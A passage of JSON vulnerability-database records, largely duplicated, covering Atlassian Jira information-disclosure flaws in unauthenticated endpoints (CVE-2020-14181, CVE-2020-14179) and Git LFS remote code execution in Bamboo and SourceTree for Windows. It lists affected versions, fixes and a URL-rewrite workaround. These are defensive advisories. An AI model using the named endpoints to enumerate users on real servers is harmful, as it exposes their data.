It is, therefore, affected by an information disclosure vulnerability in the ViewUserHover.jspa endpoint allowing an unauthenticated user to enumerate users.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-07-02T00:00:00", "type": "nessus", "title": "Atlassian Jira < 7.13.16 Information Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14181"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112853", "href": "https://www.tenable.com/plugins/was/112853", "sourceData": "No source data", "cvss": {"score": 5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "attackerkb": [{"lastseen": "2022-02-23T14:33:20", "description": "Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. 
The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-09-16T00:00:00", "type": "attackerkb", "title": "CVE-2020-14181", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181"], "modified": "2020-09-19T00:00:00", "id": "AKB:0E7B1AC9-8AA4-4E6C-BB8C-A92654F9F59D", "href": "https://attackerkb.com/topics/oIM3R25bFH/cve-2020-14181", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "atlassian": [{"lastseen": "2022-01-05T06:15:04", "description": "Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint.\r\n\r\nThis vulnerability was discovered by\u00a0Mikhail Klyuchnikov of\u00a0Positive Technologies.\r\n\r\n*Affected versions:*\r\n * version < 7.13.16\r\n * 8.0.0 \u2264 version < 8.5.7\r\n * 8.6.0 \u2264 version < 
8.12.0\r\n\r\n*Fixed versions:*\r\n * 7.13.16\r\n * 8.5.7\r\n * 8.12.0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-09-16T03:13:06", "type": "atlassian", "title": "User Enumeration via /ViewUserHover.jspa - CVE-2020-14181", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181"], "modified": "2021-06-02T08:58:39", "id": "JRASERVER-71560", "href": "https://jira.atlassian.com/browse/JRASERVER-71560", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:40:42", "description": "Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint.\r\n\r\nThis vulnerability was discovered by\u00a0Mikhail Klyuchnikov of\u00a0Positive Technologies.\r\n\r\n*Affected versions:*\r\n * version < 7.13.16\r\n * 8.0.0 \u2264 version < 8.5.7\r\n * 8.6.0 \u2264 version < 8.12.0\r\n\r\n*Fixed versions:*\r\n * 7.13.16\r\n * 8.5.7\r\n * 8.12.0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-09-16T03:13:06", "type": "atlassian", "title": "User Enumeration via /ViewUserHover.jspa - CVE-2020-14181", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181"], "modified": "2021-06-02T08:58:39", "id": "ATLASSIAN:JRASERVER-71560", "href": "https://jira.atlassian.com/browse/JRASERVER-71560", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-16T06:43:41", "description": "A remote code exeecution vulnerability was recently discovered in Git LFS:\r\n\r\nhttps://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html\r\n\r\nVulnerable git clients that clone a malicious repository are vulnerable to remote code execution. \r\n\r\nPlease determine if Bamboo is vulnerable. If it is definitively determined not to be affected, please close this as a false positive. 
If it is vulnerable, please work on remediating the issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-26T17:02:11", "type": "atlassian", "title": "Git LFS on Windows vulnerable to remote code execution (CVE-2020-27955)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-09-16T05:28:41", "id": "ATLASSIAN:BAM-21284", "href": "https://jira.atlassian.com/browse/BAM-21284", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T07:09:13", "description": "A remote code exeecution vulnerability was recently discovered in Git LFS:\r\n\r\nhttps://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html\r\n\r\nVulnerable git clients that clone a malicious repository are vulnerable to remote code execution. \r\n\r\nPlease determine if Bamboo is vulnerable. If it is definitively determined not to be affected, please close this as a false positive. 
If it is vulnerable, please work on remediating the issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-26T17:02:11", "type": "atlassian", "title": "Git LFS on Windows vulnerable to remote code execution (CVE-2020-27955)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-09-16T05:28:41", "id": "BAM-21284", "href": "https://jira.atlassian.com/browse/BAM-21284", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-01T10:42:52", "description": "h3. Summary\r\nAffected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint.\r\n\r\nh3. Affected versions:\r\n * version < 8.5.8\r\n * 8.6.0 \u2264 version < 8.11.1\r\n\r\nh4. Fixed versions:\r\n * 8.5.8\r\n * 8.11.1 and above, including 8.13.x\r\n \r\nh3. Note on fix\r\nWe've been unable to fully fix this issue due to short SLA and possible performance problems that fix could introduce. 
Please check the workaround section for mitigation steps. \r\n\r\nh3. Workaround - Fix Versions\r\nTo workaround this bug on Jira versions listed in \"fixed in versions\" above, one of the two techniques can be used:\r\n\r\n* Add the dark feature \"*public.access.disabled*\" (see [How to control anonymous user access in a public Jira instance|https://confluence.atlassian.com/jirakb/how-to-control-anonymous-user-access-in-a-public-jira-instance-975031479.html]) \r\n** In the fix versions above, the endpoint will now return 401 for anonymous users.\r\n* Add the newly added dark feature \"*com.atlassian.jira.plugin.issuenavigator.anonymousPreventCfData.enabled*\"\r\n** 200 will be returned, however the output will filter out all custom fields from response only when not authenticated\r\n** (!) The side effect of turning on \"com.atlassian.jira.plugin.issuenavigator.anonymousPreventCfData.enabled\" flag is that in basic mode of issue search (https://confluence.atlassian.com/jirasoftwareserver/basic-searching-939938708.html) there won't be any custom fields available for anonymous uses + there should be warning presented that \"You\u2019re not logged in, so you can\u2019t use custom fields in basic search. Log in or switch to advanced search.\".\r\nAdvanced mode should work fine (https://confluence.atlassian.com/jirasoftwareserver/advanced-searching-939938733.html).\r\n\r\nh3. Workaround - Non-fix versions\r\nIf you are running Jira that is below one of the \"fixed in versions\" above and should not be open to unauthenticated users, you may block the affected endpoint from anonymous users by using the URL rewrite system. \r\n\r\nFirst, add the *public.access.disabled* [dark feature|https://confluence.atlassian.com/jirakb/how-to-control-anonymous-user-access-in-a-public-jira-instance-975031479.html] as above. This blocks access to the Jira issue navigator when unauthenticated. 
\r\n\r\nThen, on each node, block the QueryComponent endpoints:\r\n # Edit the file JIRA_INSTALL/atlassian-jira/WEB-INF/urlrewrite.xml\r\n # Insert a new rule, directly underneath the last </rule> line (but before the </urlrewrite> line): \r\n{code}\r\n <rule>\r\n <from>(?s)/QueryComponent!.*\\.jspa</from>\r\n <condition type=\"session-attribute\" name=\"seraph_defaultauthenticator_user\" operator=\"notequal\">.+</condition>\r\n <set type=\"status\">403</set>\r\n <to>null</to>\r\n </rule>\r\n{code}\r\n# Restart the node\r\n\r\n(i) If for whatever reason you have scripted basic authentication calls to these endpoints (EG, python/curl requests), they will all be blocked, authenticated or not. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-09-10T04:31:31", "type": "atlassian", "title": "Sensitive data exposure via /secure/QueryComponent!Default.jspa endpoint - CVE-2020-14179", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14179", "CVE-2020-14181"], "modified": "2022-08-01T07:52:22", "id": "JRASERVER-71536", "href": "https://jira.atlassian.com/browse/JRASERVER-71536", "cvss": {"score": 5.0, 
"vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-29T16:45:03", "description": "h3. Summary\r\nAffected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint.\r\n\r\nh3. Affected versions:\r\n * version < 8.5.8\r\n * 8.6.0 \u2264 version < 8.11.1\r\n\r\nh4. Fixed versions:\r\n * 8.5.8\r\n * 8.11.1 and above, including 8.13.x\r\n \r\nh3. Note on fix\r\nWe've been unable to fully fix this issue due to short SLA and possible performance problems that fix could introduce. Please check the workaround section for mitigation steps. \r\n\r\nh3. Workaround - Fix Versions\r\nTo workaround this bug on Jira versions listed in \"fixed in versions\" above, one of the two techniques can be used:\r\n\r\n* Add the dark feature \"*public.access.disabled*\" (see [How to control anonymous user access in a public Jira instance|https://confluence.atlassian.com/jirakb/how-to-control-anonymous-user-access-in-a-public-jira-instance-975031479.html]) \r\n** In the fix versions above, the endpoint will now return 401 for anonymous users.\r\n* Add the newly added dark feature \"*com.atlassian.jira.plugin.issuenavigator.anonymousPreventCfData.enabled*\"\r\n** 200 will be returned, however the output will filter out all custom fields from response only when not authenticated\r\n** (!) The side effect of turning on \"com.atlassian.jira.plugin.issuenavigator.anonymousPreventCfData.enabled\" flag is that in basic mode of issue search (https://confluence.atlassian.com/jirasoftwareserver/basic-searching-939938708.html) there won't be any custom fields available for anonymous uses + there should be warning presented that \"You\u2019re not logged in, so you can\u2019t use custom fields in basic search. 
Log in or switch to advanced search.\".\r\nAdvanced mode should work fine (https://confluence.atlassian.com/jirasoftwareserver/advanced-searching-939938733.html).\r\n\r\nh3. Workaround - Non-fix versions\r\nIf you are running Jira that is below one of the \"fixed in versions\" above and should not be open to unauthenticated users, you may block the affected endpoint from anonymous users by using the URL rewrite system. \r\n\r\nFirst, add the *public.access.disabled* [dark feature|https://confluence.atlassian.com/jirakb/how-to-control-anonymous-user-access-in-a-public-jira-instance-975031479.html] as above. This blocks access to the Jira issue navigator when unauthenticated. \r\n\r\nThen, on each node, block the QueryComponent endpoints:\r\n # Edit the file JIRA_INSTALL/atlassian-jira/WEB-INF/urlrewrite.xml\r\n # Insert a new rule, directly underneath the last </rule> line (but before the </urlrewrite> line): \r\n{code}\r\n <rule>\r\n <from>(?s)/QueryComponent!.*\\.jspa</from>\r\n <condition type=\"session-attribute\" name=\"seraph_defaultauthenticator_user\" operator=\"notequal\">.+</condition>\r\n <set type=\"status\">403</set>\r\n <to>null</to>\r\n </rule>\r\n{code}\r\n# Restart the node\r\n\r\n(i) If for whatever reason you have scripted basic authentication calls to these endpoints (EG, python/curl requests), they will all be blocked, authenticated or not. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-09-10T04:31:31", "type": "atlassian", "title": "Sensitive data exposure via /secure/QueryComponent!Default.jspa endpoint - CVE-2020-14179", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14179", "CVE-2020-14181"], "modified": "2021-11-29T15:11:44", "id": "ATLASSIAN:JRASERVER-71536", "href": "https://jira.atlassian.com/browse/JRASERVER-71536", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-16T06:43:48", "description": "Git LFS is vulnerable to remote code execution on Windows (CVE-2021-21237):\r\n\r\nOn Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. 
This does not affect Unix systems.\r\n\r\nThis is the result of an incomplete fix for CVE-2020-27955.\r\n\r\nThis issue occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator.\r\n\r\nFix contains only changes to Windows AMIs used by Bamboo Elastic agents", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-10T11:05:09", "type": "atlassian", "title": "Bamboo for Windows uses a version of Git LFS vulnerable to remote code execution (CVE-2021-21237)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-09-16T05:28:41", "id": "ATLASSIAN:BAM-21267", "href": "https://jira.atlassian.com/browse/BAM-21267", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:40:38", "description": "There was an argument injection vulnerability in SourceTree for Windows introduced through git-lfs. 
An attacker could create a malicious repository which, after being cloned in SourceTree for Windows and enabled with git-lfs, is able to exploit this issue to gain code execution on the system.\u00a0*This is the result of an incomplete fix for CVE-2020-27955*\r\n\r\n*Affected versions:*\r\n * Version\u00a03.4.2 and earlier\r\n\r\n\u00a0\r\n\r\n*Fix*\r\n * You can download the latest version of\u00a0the [standard installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourceTreeSetup-3.3.9.exe] or the [enterprise installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourcetreeEnterpriseSetup_3.3.9.msi].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/display/SOURCETREEKB/SourceTree+for+Windows+Security+Advisory+24th+March+2021]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-26T17:00:21", "type": "atlassian", "title": "RCE via git-lfs in Sourcetree for Windows - CVE-2021-21237", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": 
"2021-03-24T16:51:11", "id": "ATLASSIAN:SRCTREEWIN-13480", "href": "https://jira.atlassian.com/browse/SRCTREEWIN-13480", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T06:08:44", "description": "There was an argument injection vulnerability in SourceTree for Windows introduced through git-lfs. An attacker could create a malicious repository which, after being cloned in SourceTree for Windows and enabled with git-lfs, is able to exploit this issue to gain code execution on the system.\u00a0*This is the result of an incomplete fix for CVE-2020-27955*\r\n\r\n*Affected versions:*\r\n * Version\u00a03.4.2 and earlier\r\n\r\n\u00a0\r\n\r\n*Fix*\r\n * You can download the latest version of\u00a0the [standard installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourceTreeSetup-3.3.9.exe] or the [enterprise installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourcetreeEnterpriseSetup_3.3.9.msi].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/display/SOURCETREEKB/SourceTree+for+Windows+Security+Advisory+24th+March+2021]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-26T17:00:21", "type": "atlassian", "title": "RCE via git-lfs in Sourcetree for Windows - CVE-2021-21237", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-03-24T16:51:11", "id": "SRCTREEWIN-13480", "href": "https://jira.atlassian.com/browse/SRCTREEWIN-13480", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T06:08:43", "description": "There was an argument injection vulnerability in SourceTree for Windows introduced through git-lfs. An attacker could create a malicious repository which, after being cloned in SourceTree for Windows and enabled with git-lfs, is able to exploit this issue to gain code execution on the system.\r\n\r\n*Affected versions:*\r\n * Version\u00a03.3.9\u00a0and earlier\r\n\r\n\u00a0\r\n\r\n*Fix*\r\n * You can download the latest version of\u00a0the [standard installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourceTreeSetup-3.3.9.exe] or the [enterprise installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourcetreeEnterpriseSetup_3.3.9.msi].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/display/SOURCETREEKB/SourceTree+for+Windows+Security+Advisory+24th+March+2021]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-07T17:07:10", "type": "atlassian", "title": "RCE via git-lfs in Sourcetree for Windows - CVE-2020-27955", 
"bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-03-24T16:50:54", "id": "SRCTREEWIN-13410", "href": "https://jira.atlassian.com/browse/SRCTREEWIN-13410", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T07:09:14", "description": "Git LFS is vulnerable to remote code execution on Windows (CVE-2021-21237):\r\n\r\nOn Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. 
This does not affect Unix systems.\r\n\r\nThis is the result of an incomplete fix for CVE-2020-27955.\r\n\r\nThis issue occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator.\r\n\r\nFix contains only changes to Windows AMIs used by Bamboo Elastic agents", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T11:05:09", "type": "atlassian", "title": "Bamboo for Windows uses a version of Git LFS vulnerable to remote code execution (CVE-2021-21237)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-09-16T05:28:41", "id": "BAM-21267", "href": "https://jira.atlassian.com/browse/BAM-21267", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:40:50", "description": "There was an argument injection vulnerability in SourceTree for Windows introduced through git-lfs. 
